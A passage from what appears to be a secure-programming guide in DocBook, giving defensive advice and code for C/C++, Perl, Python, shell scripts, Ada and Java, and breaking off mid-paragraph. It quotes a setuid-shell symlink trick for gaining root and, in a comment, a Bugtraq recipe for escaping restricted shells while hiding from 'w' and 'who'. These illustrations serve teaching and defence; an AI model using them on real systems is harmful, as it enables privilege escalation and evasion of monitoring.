Some systems (such as many GNU/Linux systems) don't protect
against double-freeing at all by default, and it is not clear that those
systems which attempt to protect themselves are truly unsubvertable.
For example, on March 11, 2002, it was announced that the zlib
library had a double-free problem, affecting the many programs that use it.
<!-- http://www.linuxsecurity.com/articles/security_sources_article-4582.html -->
Although I haven't seen anything written on the subject, I suspect that
using the incorrect call in C++ (e.g., mixing new and malloc()) could
have similar effects.
Thus, when testing programs on GNU/Linux,
you should set the environment variable
MALLOC_CHECK_ to 1 or 2, and you might consider running your program
with that variable set to each of 0, 1, and 2.
The reason for this variable is explained in the GNU/Linux malloc(3) man page:
<blockquote>
<para>
Recent versions of Linux libc (later than 5.4.23) and
GNU libc (2.x) include a malloc implementation which is tunable
via environment variables.
When MALLOC_CHECK_ is set, a special (less efficient) implementation
is used which is designed to be tolerant against simple errors,
such as double calls of free() with the same argument,
or overruns of a single byte (off-by-one bugs).
Not all such errors can be protected against, however, and memory leaks
can result.
If MALLOC_CHECK_ is set to 0, any detected heap corruption
is silently ignored;
if set to 1, a diagnostic is printed on stderr;
if set to 2, abort() is called immediately.
This can be useful because otherwise a crash may happen much later,
and the true cause for the problem is then very hard to track down.
</para>
</blockquote>
There are various tools to deal with this, such as
Electric Fence and Valgrind;
see <xref linkend="tools"> for more information.
If unused memory is not freed (e.g., using free()), that unused memory
may accumulate - and if enough unused memory can accumulate, the
program may stop working.
As a result, the unused memory may be exploitable by attackers to
create a denial of service.
It's theoretically possible for attackers to cause memory to be
fragmented and cause a denial of service, but usually this
is a fairly impractical and low-risk attack.
</para>
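
<para>
One common defensive idiom, sketched here as a hypothetical macro, is to
reset a pointer to NULL as soon as it is freed.
Since free(NULL) is defined to do nothing, a second free through the same
variable becomes harmless.
This does nothing for other copies of the pointer, so treat it as a
safety net and not a cure.
<programlisting>
<![CDATA[
```c
#include <stdlib.h>

/* Frees p and then clears it.  The argument must be a plain
 * pointer variable (an lvalue without side effects), because
 * the macro evaluates it twice. */
#define FREE_AND_CLEAR(p) \
    do {                  \
        free(p);          \
        (p) = NULL;       \
    } while (0)
```
]]>
</programlisting>
</para>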

<para>
Be as strict as you reasonably can when you declare types.
Where you can, use ``enum'' to define enumerated values (and not
just a ``char'' or ``int'' with special values).
This is particularly useful for values in switch statements, where
the compiler can be used to determine if all legal values have been covered.
Where it's appropriate, use ``unsigned'' types if the value can't be
negative.
</para>
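
<para>
Here is a small sketch of the enum-plus-switch approach; the type and
function names are made up for illustration.
Because the switch has no ``default'' label, gcc's -Wall (which
includes -Wswitch) will warn if a new enumerator is added later and
this function is not updated.
<programlisting>
<![CDATA[
```c
#include <stddef.h>

enum access_level { ACCESS_NONE, ACCESS_READ, ACCESS_WRITE };

/* Maps each access level to a name.  Every enumerator has its
 * own case, so the compiler can check that none is missing. */
const char *access_name(enum access_level level)
{
    switch (level) {
    case ACCESS_NONE:  return "none";
    case ACCESS_READ:  return "read";
    case ACCESS_WRITE: return "write";
    }
    /* Reached only if level holds an out-of-range value. */
    return NULL;
}
```
]]>
</programlisting>
</para>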

<para>
<!-- The example is from Sebastian (Bugtraq, 26 June 2000) -->
One complication in C and C++ is that the character type ``char'' can be
signed or unsigned (depending on the compiler and machine).
When a signed char with its high bit set
is saved in an integer, the result will be a negative number;
in some cases this can be exploitable.
In general, use ``unsigned char'' instead of char or signed char for
buffers, pointers, and casts when
dealing with character data that may have values greater than 127 (0x7f).
</para>
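
<para>
The following sketch (with hypothetical function names) shows the
usual way to follow this advice: read the bytes through an
``unsigned char'' pointer, and cast to unsigned char before calling
the &lt;ctype.h&gt; classification functions.
<programlisting>
<![CDATA[
```c
#include <ctype.h>
#include <stddef.h>

/* Counts the bytes in s that are outside 7-bit ASCII.  Each
 * byte is read as an unsigned char, so 0xE9 is seen as 233 and
 * not as a negative number where plain char is signed. */
size_t count_high_bytes(const char *s)
{
    const unsigned char *p = (const unsigned char *)s;
    size_t n = 0;

    for (; *p != '\0'; p++) {
        if (*p > 127)
            n++;
    }
    return n;
}

/* The <ctype.h> functions require an unsigned char value (or
 * EOF); passing a negative char is undefined behavior. */
int is_space_byte(char c)
{
    return isspace((unsigned char)c) != 0;
}
```
]]>
</programlisting>
</para>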

<para>
C and C++ are by definition rather lax in their type-checking support, but
you can at least increase their level of checking so that some mistakes
can be detected automatically.
Turn on as many compiler warnings as you can and change the code to cleanly
compile with them, and strictly use ANSI prototypes in separate header
(.h) files to ensure that all function calls use the correct types.
For C or C++ compilations using gcc, use at least
the following as compilation flags (which turn on a host of warning messages)
and try to eliminate all warnings (note that -O2 is used since some
warnings can only be detected by the data flow analysis performed at
higher optimization levels):
<screen width="61">
gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2
</screen>
You might want ``-W -pedantic'' too.
</para>

<para>
Many C/C++ compilers can detect inaccurate format strings.
For example,
gcc can warn about inaccurate format strings for functions you create
if you use its __attribute__() facility (a C extension) to mark such functions,
and you can use that facility without making your code non-portable.
Here is an example of what you'd put in your header (.h) file:
<programlisting width="61">
 /* in header.h */
 #include &lt;stdarg.h&gt;   /* for va_list */

 #ifndef __GNUC__
 #  define __attribute__(x) /*nothing*/
 #endif

 extern void logprintf(const char *format, ...)
    __attribute__((format(printf,1,2)));
 extern void logprintva(const char *format, va_list args)
    __attribute__((format(printf,1,0)));
</programlisting>
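The "format" attribute takes either "printf" or "scanf", and the numbers
that follow are the parameter number of the format string and the parameter
number of the first variadic argument, respectively (use 0 for the latter
when the function takes a va_list, since there are then no arguments to check).
The GNU documentation describes this well.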
Note that there are other __attribute__ facilities as well,
such as "noreturn" and "const".
<!-- The __attribute__ discussion
     Derived from "Stephen J. Friedl", Sat, 22 Jul 2000 16:21:08 -0700,
     Bugtraq -->
</para>
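
<para>
To round out the header above, here is one possible implementation of
the two functions, as a sketch only.
The buffer named last_log_line is hypothetical and exists just to make
the example easy to inspect; real code would write to its own log
destination.
<programlisting>
<![CDATA[
```c
#include <stdarg.h>
#include <stdio.h>

#ifndef __GNUC__
#  define __attribute__(x) /*nothing*/
#endif

void logprintva(const char *format, va_list args)
    __attribute__((format(printf,1,0)));
void logprintf(const char *format, ...)
    __attribute__((format(printf,1,2)));

/* Hypothetical sink: keeps the most recent log line. */
static char last_log_line[256];

void logprintva(const char *format, va_list args)
{
    vsnprintf(last_log_line, sizeof last_log_line, format, args);
    fprintf(stderr, "%s\n", last_log_line);
}

void logprintf(const char *format, ...)
{
    va_list args;

    va_start(args, format);
    logprintva(format, args);
    va_end(args);
}

/* With the attribute in place, gcc -Wall checks callers:
 *   logprintf("%d items", "seven");   %d given a string
 * and -Wformat-security additionally flags:
 *   logprintf(user_input);            non-constant format
 */
```
]]>
</programlisting>
</para>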

<para>
Avoid common errors made by C/C++ developers.
For example, be careful not to use ``='' when you mean ``==''.
</para>


</sect1>

<sect1 id="perl">
<title>Perl</title>
<para>
Perl programmers should first read the man page perlsec(1),
which describes a number of issues involved with writing secure programs
in Perl.
In particular, perlsec(1) describes the ``taint'' mode, which most
secure Perl programs should use.
Taint mode is automatically enabled if the real and effective user or group
IDs differ, or you can use the -T command line flag
(use the latter if you're running on behalf of someone else, e.g.,
a CGI script).
Taint mode turns on various checks, such as checking
path directories to make sure they aren't writable by others.
</para>

<para>
The most obvious effect of taint mode, however, is that
you may not use data derived from outside your program to
affect something else outside your program by accident.
In taint mode,
all externally-obtained input is marked as ``tainted'', including
command line arguments, environment variables,
locale information (see perllocale(1)),
results of certain system calls (readdir, readlink,
the gecos field of getpw* calls), and all file input.
Tainted data may not be
used directly or indirectly in any command that invokes a
sub-shell, nor in any command that modifies files,
directories, or processes.
There is one important exception: If you
pass a list of arguments to either system or exec, the
elements of that list are NOT checked for taintedness, so
be especially careful with system or exec while in taint mode.
</para>

<para>
Any data value derived from tainted data becomes tainted also.
There is one exception to this; the way to untaint data is to
extract a substring of the tainted data.
Don't just use ``.*'' blindly as your substring, though, since this
would defeat the tainting mechanism's protections.
Instead, write patterns that match only the ``safe'' values
allowed by your program, and use them to extract ``good'' values.
After extracting the value, you may still need to check it
(in particular for its length).
</para>

<para>
The open, glob, and backtick functions
call the shell to expand filename wild card characters; this
can be used to open security holes.
You can try to avoid these functions entirely, or use them in a
less-privileged ``sandbox'' as described in perlsec(1).
In particular, backticks should be rewritten using the system() call
(or even better, changed entirely to something safer).
</para>

<para>
The perl open() function comes with, frankly,
``way too much magic'' for most secure programs; it interprets text
that, if not carefully filtered, can create lots of security problems.
Before writing code to open or lock a file, consult the perlopentut(1)
man page.
In most cases, sysopen() provides a safer (though more convoluted)
approach to opening a file.
<ulink
url="http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/msg02596.html">
The new Perl 5.6 adds an open() call
with 3 parameters to turn off the magic behavior
without requiring the convolutions of sysopen()</ulink>.
</para>

<para>
Perl programs should turn on the warning flag (-w), which warns of
potentially dangerous or obsolete statements.
</para>

<para>
You can also run Perl programs in a restricted environment.
For more information see the ``Safe'' module in the standard Perl
distribution.
I'm uncertain of the amount of auditing that this has undergone,
so beware of depending on this for security.
You might also investigate the ``Penguin Model for
Secure Distributed Internet Scripting'', though at the time
of this writing the code and documentation seem to be unavailable.
<!-- Search for Penguin FAQ, the Penguin Model for Secure Distributed
  Internet Scripting -->
</para>

<para>
Many installations include a setuid root version of perl named ``suidperl''.
However, the perldelta man page version 5.6.1 recommends using sudo
instead, stating the following:
<blockquote>
<para>
"Note that suidperl is neither built nor installed by default in
any recent version of perl.
Use of suidperl is highly discouraged.
If you think you need it, try alternatives such as sudo first.
See http://www.courtesan.com/sudo/".
</para>
</blockquote>
</para>

</sect1>

<sect1 id="python">
<title>Python</title>
<para>
As with any language,
beware of any functions which allow data to be executed as parts of
a program, to make sure an untrusted user can't affect their input.
This includes exec(), eval(), and execfile()
(and frankly, you should check carefully any call to compile()).
The input() function is also surprisingly dangerous
[Watters 1996, 150].
</para>

<para>
Python programs with privileges that can be invoked by unprivileged users
(e.g., setuid/setgid programs)
must <emphasis>not</emphasis> import the ``user'' module.
The user module causes the pythonrc.py file to be read and executed.
Since this file would be under the control of an untrusted user,
importing the user module allows an attacker to force the trusted
program to run arbitrary code.
</para>

<para>
Python does very little compile-time checking -- it has essentially
no compile-time type information, and it doesn't even check that the
number of parameters passed is legal for a given function or method.
This is unfortunate, resulting in a lot of latent bugs
(both John Viega and I have experienced this problem).
Hopefully someday Python will implement optional static typing and
type-checking, an idea that's been discussed for some time.
A partial solution for now is PyChecker, a lint-like program that
checks for common bugs in Python source code.
You can get PyChecker from
<ulink url="http://pychecker.sourceforge.net">http://pychecker.sourceforge.net</ulink>.
</para>

<para>
Python includes support for ``Restricted Execution'' through
its RExec class.
This is primarily intended for executing applets and mobile code, but
it can also be used to limit privilege in a program even when the
code has not been provided externally.
By default, a restricted execution
environment permits reading (but not writing) of files,
and does not include operations for network access or GUI interaction.
These defaults can be changed, but beware of creating loopholes in
the restricted environment.
In particular, allowing a user to unrestrictedly add attributes to a
class permits all sorts of ways to subvert the environment
because Python's implementation calls many ``hidden'' methods.
Note that, by default, most Python objects are passed by reference; if you
insert a reference to a mutable value into a restricted program's environment,
the restricted program can change the object in a way that's visible
outside the restricted environment!
Thus, if you want to give access to a mutable value, in many cases
you should copy the mutable value or use the Bastion module (which supports
restricted access to another object).
For more information, see
Kuchling [2000].
I'm uncertain of the amount of auditing that the restricted
execution capability has undergone, so programmer beware.
</para>

</sect1>

<sect1 id="shell">
<title>Shell Scripting Languages (sh and csh Derivatives)</title>
<para>
I strongly recommend against using
standard command shell scripting languages (such as csh, sh, and bash)
for setuid/setgid secure code.
Some systems (such as Linux) completely disable setuid/setgid
shell scripts, so creating setuid/setgid shell scripts creates
an unnecessary portability problem.
On some old systems they are fundamentally insecure due to a race condition
(as discussed in <xref linkend="process-creation">).
Even for other systems, they're not really a good idea.
</para>

<para>
In fact, there are a vast number of circumstances where shell scripting
languages shouldn't be used at all for secure programs.
Standard command shells are notorious for being affected by nonobvious inputs -
generally because command shells were designed to try to do
things ``automatically'' for an interactive user, not to defend against
a determined attacker.
Shell programs are fine for programs that don't need to be secure
(e.g., they run at the same privilege as the unprivileged
user and don't accept ``untrusted'' data).
They can also be useful when they're running with privilege, as long as
all the input (e.g., files, directories, command line, environment, etc.)
comes from trusted users - which is why they're
often used quite successfully in startup/shutdown scripts.
</para>

<para>
Writing secure shell programs in the presence of malicious
input is harder than in many other languages because
of all the things that shells are affected by.
For example,
``hidden'' environment variables (e.g., the ENV, BASH_ENV, and IFS values)
can affect how they operate or even execute arbitrary user-defined
code before the script can even execute.
Even things like filenames of the executable or directory contents can
affect execution.
If an attacker can create filenames containing
some control characters (e.g., newline),
or whitespace, or shell metacharacters, or begin with a dash
(the option flag syntax), there are often ways to exploit them.
For example, on many Bourne shell implementations, doing the following
will grant root access (thanks to NCSA for describing this
exploit):
<!-- http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming/#setuid-sh-exploit -->
<programlisting width="61">
 % ln -s /usr/bin/setuid-shell /tmp/-x
 % cd /tmp
 % -x
</programlisting>
Some systems may have closed this hole, but the point still stands:
most command shells aren't intended for writing secure setuid/setgid programs.
For programming purposes, avoid creating setuid shell scripts, even
on those systems that permit them.
Instead, write a small program in another language to clean up the
environment, then have it call other executables (some of which
might be shell scripts).
</para>
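
<para>
The environment-cleaning step of such a wrapper might be sketched in C
as follows.
The environment values and the function name are assumptions for
illustration only, and a real wrapper has more to worry about than the
environment (open file descriptors, signals, resource limits, and so on).
<programlisting>
<![CDATA[
```c
#include <unistd.h>

/* A fixed, minimal environment.  These particular values are
 * assumptions; choose ones appropriate for your system. */
static char *const clean_env[] = {
    "PATH=/bin:/usr/bin",
    "IFS= \t\n",
    NULL
};

/* Replaces the current process with the program at path,
 * passing argv but none of the caller's environment.
 * Returns (with -1) only if execve() itself fails. */
int exec_with_clean_env(const char *path, char *const argv[])
{
    return execve(path, argv, clean_env);
}
```
]]>
</programlisting>
Because the environment is built from scratch instead of being
filtered, variables such as ENV and BASH_ENV never reach the script,
whatever the caller set them to.
</para>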

<para>
If you still insist on using shell scripting languages, at least
put the script in a directory where it cannot be moved or changed.
Set PATH and IFS to known values very early in your script; indeed, the
environment should be cleaned before the script is called.
Also, very early on, ``cd'' to a safe directory.
Use data only from directories that are controlled by trusted users, e.g., /etc,
so that attackers can't insert maliciously-named files into those directories.
Be sure to quote every filename passed on a command line, e.g., use
"$1" not $1, because filenames with whitespace will be split.
Call commands using "--" to disable additional options where you can,
because attackers may create or pass filenames beginning with dash in the
hope of tricking the program into processing it as an option.
Be especially careful of filenames embedding other characters
(e.g., newlines and other control characters).
Examine input filenames especially carefully and be very restrictive
on what filenames are permitted.
</para>
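
<para>
If a C program checks filenames before handing them to a shell script,
a restrictive test might look like this sketch.
The policy shown (which characters are allowed, the length limit, and
the function name) is my assumption of a reasonably strict default;
adjust it to what your program actually needs to accept.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* Returns 1 if name passes a deliberately strict policy:
 * 1 to 255 characters from [A-Za-z0-9._-], not starting with
 * '-' (option syntax) or '.' (hidden files, "." and "..").
 * Slashes, whitespace, control characters, and shell
 * metacharacters are all rejected.  Returns 0 otherwise. */
int is_safe_filename(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789._-";
    size_t len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 255)
        return 0;
    if (name[0] == '-' || name[0] == '.')
        return 0;
    return strspn(name, allowed) == len;
}
```
]]>
</programlisting>
</para>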

<para>
If you don't mind limiting your program to only work with GNU tools
(or if you detect and optionally use the GNU tools instead when
they are available), you might want
to use NUL characters as the filename terminator instead of newlines.
By using NUL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with
embedded newlines) is much simpler.
Several GNU tools that output or input filenames can use this format
instead of the more common ``one filename per line'' format.
Unfortunately, the name of this option isn't consistent between tools;
for many tools the name of this option is ``--null'' or ``-0''.
GNU programs xargs and cpio allow using either --null or -0,
tar uses --null,
find uses -print0,
grep uses either --null or -Z, and
sort uses either -z or --zero-terminated.
Those who find this inconsistency particularly disturbing are invited
to supply patches to the GNU authors;
I would suggest making sure every program supported ``--null'' since that
seems to be the most common option name.
For example, here's one way to move files to a target directory, even
if there may be a vast number of files and some may have awkward names
with embedded newlines
(thanks to Jim Dennis for reminding me of this):
<programlisting>
 find . -print0 | xargs --null mv --target-directory="$TARG"
</programlisting>
<!--
Noted briefly in:
http://www.linuxjournal.com//article.php?sid=6060
-->
</para>
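
<para>
To show how the differently-named options fit together, here is a
small sketch that chains several of the tools listed above.
It assumes the GNU versions of find, sort, xargs, grep, and tr are
installed, and that the directory name passed in does not itself begin
with a dash; the function name count_matching_files is made up for this
example.
<programlisting>
<![CDATA[
#!/bin/sh
# Sketch only; assumes GNU find, sort, xargs, grep and tr.

# Hypothetical helper: print the number of regular files under
# directory "$1" that contain the fixed string "$2".
count_matching_files() {
    # Every stage passes NUL-terminated names, so names with
    # spaces, newlines or a leading dash arrive intact.
    find "$1" -type f -print0 |
        sort -z |
        xargs -0 -r grep -lZF -e "$2" -- |
        tr -cd '\0' |
        wc -c
}
]]>
</programlisting>
The final two stages count the NUL terminators instead of counting lines,
since a line count would be wrong for any filename containing a newline.
</para>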

<para>
In a similar vein, I recommend <emphasis>not</emphasis> trusting
``restricted shells'' to implement secure policies.
Restricted shells are shells that intentionally prevent users from
performing a large set of activities - their goal is to force users
to only run a small set of programs.
A restricted shell can be useful as a defense-in-depth measure, but
restricted shells are notoriously hard to configure correctly and as
configured are often subvertable.
For example, some restricted shells will start by running some file
in an unrestricted mode (e.g., ``.profile'') - if a user can change this
file, they can force execution of that code.
A restricted shell should be set up to only run a few programs, but
if any of those programs have ``shell escapes'' to let users run more
programs, attackers can use those shell escapes to escape the
restricted shell.
Even if the programs don't have shell escapes, it's quite likely that
the various programs can be used together (along with the shell's capabilities)
to escape the restrictions.
Of course, if you don't set the PATH of a restricted shell (and allow
any program to run), then an attacker can use the shell escapes of
many programs (including text editors, mailers, etc.).
The problem is that the purpose of a shell is to run other programs,
but those other programs may allow unintended operations -- and the
shell doesn't interpose itself to prevent these operations.
</para>

<!--

(From Bugtraq)

Subject: Restricted Shells
From: A.Dimitrov <adimitro@bobcat.gcsu.edu>
Date: 18 Apr 2002 21:12:23 -0000
To: bugtraq@securityfocus.com

I have recently realized a security issue in some
of the restricted shells on *NIX systems. I am not
sure if I am the first one to discover the problem
I am going to discuss but I am sure that it has
not been posted yet, atleast not that I know of.

Basically this is the issue:

Affected Systems:
=================
Any Unix systems that I am aware of using
restricted shells (rbash, rksh)

Description:
============
An authorized user is that is set to use rbash or
rksh is able to escape the restricted shell
environment and then furthermore exploit the
system. The problem comes from the fact thatwhen a
command is executed from the shell and it is found
to be a shell procedure then rksh or rbash are
invoked to  execute it.

Proof:
======

One needs to store the shell script in a
world-writable directory like /tmp or /usr/tmp
so let's assume the server is running sshd (This
is also exploitable through rsh). In this case
store in a file called anything you want (I will
use .tmp123) the following:

===

/usr/bin/bash
rm -Rf /tmp/.tmp123

===


Then execute the following:

$scp ./.tmp123 user@host:/tmp  user@host's password:

Done.

$ssh -l user host '/tmp/.tmp123'
user@host's password:
_


You should now have a normal bash shell instead
of the original rbash.
Also a great plus to doing this is that whenever
you follow the procedure above the commands 'w'
and 'who' cannot detect your presence. However
'ps' dows show the intruder's presence.

Fix:
====
I am not aware of any except maybe an attempt to
retune the system. If anyone has any ideas please
e-mail me.

A. Dimitrov
System Administrator
Georgia College & State University


A reply in 18 April 2002 Bugtraq said:
Subject: Re: Restricted Shells
From: "Scott T. Cameron" <karn@routehero.com>
Date: Thu, 18 Apr 2002 17:58:13 -0700
To: bugtraq@securityfocus.org

[snip]

With sshd2, you should be able use 'ChrootGroups' or 'ChrootUsers' to fix this problem.  Please see sshd2_config(5).


(but of course, this still shows that restricted shells are hard to
use correctly).

-->
</sect1>

<sect1 id="ada">
<title>Ada</title>
<para>
In Ada95, the Unbounded_String type is often more flexible than the
String type because it is automatically resized as necessary.
However, don't store especially sensitive secret values such as passwords
or secret keys in an Unbounded_String, since core dumps and swap space
might still hold them later.
Instead, use the String type for this data, lock it into memory
while it's used, and overwrite the data as
soon as possible with some constant value such as (others => ' ').
Use the Ada pragma Inspection_Point on the object holding the secret
after erasing the memory.
That way, you can be certain that
the object containing the secret will really be erased
(and that the overwriting won't be optimized away).
</para>

<para>
It's common for beginning Ada programmers to believe that the
String type's first index value is always 1, but this isn't true if
the string is sliced.
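Avoid this error by indexing with the attributes 'First, 'Last, and 'Range
rather than assuming that the first index is 1.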
</para>

<para>
It's worth noting that SPARK is
a ``high-integrity subset of the Ada programming language'';
SPARK users use a tool called the ``SPARK Examiner'' to check
conformance to SPARK rules, including flow analysis, and there is
tool support for full formal proof of the code if desired.
<ulink url="http://www.sparkada.com">See the SPARK website for more
information</ulink>.
To my knowledge, there are no OSS/FS SPARK tools.
If you're storing passwords and private keys you should still
lock them into memory if appropriate
and overwrite them as soon as possible.
Note that SPARK is often used in environments where paging does not occur.
</para>
</sect1>

<sect1 id="java">
<title>Java</title>

<para>
<!-- Could mention "Core Java 2"; see http://www.amazon.com/
     exec/obidos/ASIN/0130819336/ref=sim_books/102-4729136-4374443 -->
<!-- ???: Add more information about creating your own domains inside
     a Java program.-->
If you're developing secure programs using Java,
frankly your first step (after learning Java)
is to read the two primary texts for Java security, namely
Gong [1999]
and
McGraw [1999] (for the latter, look particularly at section 7.1).
You should also look at Sun's posted security code guidelines at
<ulink url="http://java.sun.com/security/seccodeguide.html">http://java.sun.com/security/seccodeguide.html</ulink>, and
there's a nice
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
article by Sahu et al [2002]</ulink>.
A set of slides describing Java's security model is freely available at
<ulink url="http://www.dwheeler.com/javasec">http://www.dwheeler.com/javasec</ulink>.
You can also see McGraw [1998].
</para>

<para>
Obviously, a great deal depends on the kind of application you're developing.
Java code intended for use on the client side has a completely different
environment (and trust model) than code intended for the server side.
The general principles apply, of course; for example, you must
check and filter any input from an untrusted source.
However, in Java there are some ``hidden'' inputs or potential inputs that you
need to be wary of, as discussed below.
Johnathan Nightingale [2000] made an interesting statement
summarizing many of the issues in Java programming:
<blockquote>
<para>
... the big thing with Java programming is minding your inheritances.
If you inherit methods from parents, interfaces, or
parents' interfaces, you risk opening doors to your code.
</para>
</blockquote>
<!-- Secprog, Wed, 1 Nov 2000 18:46:43 -0500, Re: Secure Java programming -->
</para>

<para>
The following are a few key guidelines, based on Gong [1999],
McGraw [1999], Sun's guidance, and my own experience:

<orderedlist>

<listitem><para>
Do not use public fields or variables; declare them as private and
provide accessors to them so you can limit their accessibility.
</para></listitem>

<listitem><para>
Make methods private unless there is a good reason to do otherwise
(and if you do otherwise, document why).
These non-private methods must protect themselves, because they may
receive tainted data (unless you've somehow arranged to protect them).
</para></listitem>

<listitem><para>
The JVM may not actually enforce the accessibility modifiers
(e.g., ``private'') at run-time in an application
(as opposed to an applet).
My thanks to John Steven (Cigital Inc.), who pointed this out
on the ``Secure Programming'' mailing list on November 7, 2000.
The issue is that it all depends on what class loader
the class requesting the access was loaded with.
If the class was loaded with a trusted class loader (including the null/
primordial class loader),
the access check returns "TRUE" (allowing access).
For example, this works
(at least with Sun's 1.2.2 VM; it might not work with
other implementations):
<orderedlist>
<listitem><para>write a victim class (V) with a public field, compile it.</para></listitem>
<listitem><para>write an 'attack' class (A) that accesses that field, compile it </para></listitem>
<listitem><para>change V's public field to private, recompile</para></listitem>
<listitem><para>run A - it'll access V's (now private) field.</para></listitem>
</orderedlist>
</para>
<para>
However, the situation is different with applets.
If you convert A to an applet and run it as an applet
(e.g., with appletviewer or browser), its class loader is no
longer a trusted (or null) class loader.
Thus, the code will throw
java.lang.IllegalAccessError, with the message that
you're trying to access a field V.secret from class A.
</para></listitem>
<!-- Source: SECPROG
Date:    Tue, 7 Nov 2000 16:52:47 -0500
From:    John Steven jsteven@CIGITAL.COM
Subject: Re: Java and 'private'

I looked into this w/ the Java 1.1 VM Spec., and the 1.2.2 VM source,
'spent only a short amount of time on it-mileage may vary.
-->

<listitem><para>
Avoid using static field variables. Such variables are attached to the
class (not class instances), and classes can be located by any other class.
As a result, static field variables can be found by any other class, making
them much more difficult to secure.
</para></listitem>

<listitem><para>
Never return a mutable object to potentially malicious code
(since the code may decide to change it).
Note that arrays are mutable (even if the array contents aren't),
so don't return a reference to an internal array with sensitive data.
</para></listitem>

<listitem><para>
Never store user-supplied mutable objects (including arrays of objects)
directly.
Otherwise, the user could hand the object to the secure code, let the
secure code ``check'' the object, and change the data while the secure code
was trying to use the data.
Clone arrays before saving them internally, and be careful here
(e.g., beware of user-written cloning routines).
</para></listitem>

<listitem><para>
Don't depend on initialization.
There are several ways to allocate uninitialized objects.
</para></listitem>

<listitem><para>
Make everything final, unless there's a good reason not to.
If a class or method is non-final, an attacker could try to extend it
in a dangerous and unforeseen way.
Note that this causes a loss of extensibility, in exchange for security.
</para></listitem>

<listitem><para>
Don't depend on package scope for security.
A few classes, such as java.lang, are closed by default, and some
Java Virtual Machines (JVMs) let you close off other packages.
Otherwise, Java classes are not closed.
Thus, an attacker could introduce a new class inside your package,
and use this new class to access the things you thought you were protecting.
</para></listitem>

<listitem><para>
Don't use inner classes.
When inner classes are translated into byte codes, the inner class
is translated into a class accessible to any class in the package.
Even worse, the enclosing class's private fields silently
become non-private to permit access by the inner class!
</para></listitem>

<listitem><para>
Minimize privileges.
Where possible, don't require any special permissions at all.
McGraw goes further and recommends not signing any code; I say
go ahead and sign the code (so users can decide to ``run only
signed code by this list of senders''), but try to write the program
so that it needs nothing more than the sandbox set of privileges.
If you must have more privileges, audit that code especially hard.
</para></listitem>

<listitem><para>
If you must sign your code, put it all in one archive file.
Here it's best to quote McGraw [1999]:
<blockquote>
<para>
The goal of this rule is to prevent
an attacker from carrying out a mix-and-match
attack in which the attacker constructs a new applet
or library that links some of your signed classes together
with malicious classes, or links together signed classes that you
never meant to be used together.
By signing a group of classes together, you make this attack more difficult.
Existing code-signing systems do an inadequate job of
preventing mix-and-match attacks, so this rule cannot
prevent such attacks completely. But using a single archive can't hurt.
</para>
</blockquote>
</para></listitem>

<listitem><para>
Make your classes uncloneable.
Java's object-cloning mechanism allows an attacker to
instantiate a class without running any of its constructors.
To make your class uncloneable, just define the following method
in each of your classes:
<!-- Originally this said void, not Object; I'm told Object is correct.  -->
<programlisting width="71">
<![CDATA[
public final Object clone() throws java.lang.CloneNotSupportedException {
   throw new java.lang.CloneNotSupportedException();
   }
]]>
</programlisting>
</para>
<para>
If you really need to make your class cloneable, then there are some
protective measures you can take to prevent attackers from redefining
your clone method.
If you're defining your own clone method, just make it final.
If you're not, you can at least prevent the clone method from
being maliciously overridden by adding the following:
<programlisting width="71">
<![CDATA[
public final Object clone() throws java.lang.CloneNotSupportedException {
  return super.clone();
  }
]]>
</programlisting>
</para></listitem>

<listitem><para>
Make your classes unserializeable.
Serialization allows attackers to view the internal state of your objects,
even private portions.
To prevent this, add this method to your classes:
<programlisting width="66">
<![CDATA[
private final void writeObject(java.io.ObjectOutputStream out)
  throws java.io.IOException {
     throw new java.io.IOException("Object cannot be serialized");
  }
]]>
</programlisting>
</para>
<para>
Even in cases where serialization is okay, be sure to use
the transient keyword for the fields
that contain direct handles to system resources and
that contain information relative to an address space.
Otherwise, deserializing the class may permit improper access.
You may also want to identify sensitive information as transient.
</para>

<para>
If you define your own serializing method for a class,
it should not pass an internal array to any DataInput/DataOutput
method that takes an array.
The rationale: All DataInput/DataOutput methods can be overridden.
If a Serializable class passes a private array directly to a DataOutput
write(byte[] b) method, then an attacker
could subclass ObjectOutputStream and override the write(byte[] b)
method to gain access to, and modify, the private array.
Note that the default serialization does not expose private
byte array fields to DataInput/DataOutput byte array methods.
</para></listitem>

<listitem><para>
Make your classes undeserializeable.
Even if your class is not serializeable, it may still be deserializeable.
An attacker can create a sequence of bytes that happens
to deserialize to an instance of your class with values of the
attacker's choosing.
In other words, deserialization is a kind of public constructor, allowing
an attacker to choose the object's state - clearly a dangerous operation!
To prevent this, add this method to your classes:
<programlisting width="66">
<![CDATA[
private final void readObject(java.io.ObjectInputStream in)
  throws java.io.IOException {
    throw new java.io.IOException("Class cannot be deserialized");
  }
]]>
</programlisting>
</para></listitem>

<listitem><para>
Don't compare classes by name.
After all, attackers can define classes with identical names, and if
you're not careful you can cause confusion by granting these classes
undesirable privileges.
Thus, here's an example of the <emphasis>wrong</emphasis> way
to determine if an object has a given class:
<programlisting width="65">
<![CDATA[
  if (obj.getClass().getName().equals("Foo")) {
]]>
</programlisting>
</para>
<para>
If you need to determine if two objects have exactly the
same class, instead
use getClass() on both sides and compare using the == operator.
Thus, you should use this form:
<programlisting width="65">
<![CDATA[
  if (a.getClass() == b.getClass()) {
]]>
</programlisting>
If you truly need to determine if an object has a given classname, you
need to be pedantic and be sure to use the current namespace
(of the current class's ClassLoader).
Thus, you'll need to use this format:
<programlisting width="65">
<![CDATA[
  if (obj.getClass() == this.getClass().getClassLoader().loadClass("Foo")) {
]]>
</programlisting>
</para>
<para>
This guideline is from McGraw and Felten, and it's a good guideline.
I'll add that, where possible, it's often a good idea to avoid comparing
class values anyway.
It's often better to try to design class methods and interfaces so you
don't need to do this at all.
However, this isn't always practical, so it's important to know these tricks.
</para></listitem>

<listitem><para>
Don't store secrets (cryptographic keys, passwords, or
algorithms) in the code or data.
Hostile JVMs can quickly view this data.
Code obfuscation doesn't really hide the code from serious attackers.
</para></listitem>

</orderedlist>

</para>
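
<para>
Several of the guidelines above (private fields, final classes, copying
mutable data on the way in and on the way out, and comparing classes
rather than class names) can be combined in a few lines.
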